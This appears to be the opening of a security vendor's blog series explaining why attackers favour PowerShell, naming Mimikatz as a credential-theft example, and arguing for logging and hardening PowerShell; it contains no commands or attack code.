Hello! My name is Rohit Chettiar, and I am a Solutions Engineer at Rapid7. In this series, we will discuss why organizations should care about malicious PowerShell activity, how attackers use PowerShell to steal credentials (e.g., Mimikatz), and how to prevent and detect malicious PowerShell activity.
Why do attackers love PowerShell?
PowerShell, a powerful Windows scripting language, is used by IT professionals and adversaries alike. Attackers favor PowerShell for several reasons:
It is a built-in command line tool
It can download and execute code from another system
It provides unprecedented access on Windows computers
It’s enabled on most computers, as system administrators use PowerShell to automate various tasks (e.g,. shut down your machines automatically at 12 a.m.—do this via task scheduler)
Its malicious use is often not stopped or detected by traditional endpoint defenses, as files and commands are not written to disk. This means fewer artifacts to recover for forensic analysis.
Several offensive tools exist that are built on or use PowerShell, including the following:
Despite these challenges, eliminating PowerShell isn’t ideal due to the benefits it offers IT administrators. Instead, we need to learn how to secure PowerShell. A common issue we experience is a lack of available logging to understand the actions an attacker has performed using PowerShell. These logs will help you obtain the visibility needed to better respond, investigate, and remediate attacks involving PowerShell.
Before we look at different ways in which we can defend against PowerShell attacks, let’s take a deep dive into PowerShell usage to dump passwords with Mimikatz.
